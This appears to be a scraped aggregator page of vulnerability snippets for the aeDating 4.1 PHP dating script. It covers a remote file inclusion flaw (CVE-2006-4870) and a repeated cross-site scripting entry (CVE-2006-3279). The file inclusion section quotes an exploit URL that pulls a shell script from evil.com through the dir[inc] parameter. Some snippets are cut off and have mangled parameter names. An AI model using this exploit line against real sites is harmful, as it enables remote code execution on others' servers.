CVE-2006-4870

CVE-2006-4870 describes multiple PHP remote file inclusion vulnerabilities in AEDating 4.1 (and possibly earlier). A remote attacker can execute arbitrary PHP code by supplying a URL in the dir[inc] parameter targeting inc/design.inc.php or inc/admin_design.inc.php. The vulnerability’s impact is ...

aeDating 4.1 - dir[inc] Remote File Inclusion

AEDating all versions Remote File inclusion. Vulnerable code: /inc/design.inc.php /inc/admindesign.inc.php requireonce "$dirincdb.inc.php" ; requireonce "$dirincprof.inc.php" ; Exploit: http://site.com/scriptpath/inc/design.inc.php?dirinc=http://evil.com/shell.txt?...

CVE-2006-3279

Cross-site scripting XSS vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the 1 Sex parameter in index.php, 2 ProfileType parameter in joinform.php, and 3 Email parameter in forgot.php...

CVE-2006-3279

Cross-site scripting XSS vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the 1 Sex parameter in index.php, 2 ProfileType parameter in joinform.php, and 3 Email parameter in forgot.php...

CVE-2006-3279

CVE-2006-3279 describes a cross-site scripting (XSS) vulnerability in aeDating 4.1. The affected application exposes three vulnerable input points: the Sex parameter in index.php, the ProfileType parameter in join_form.php, and the Email parameter in forgot.php. These allow remote attackers to in...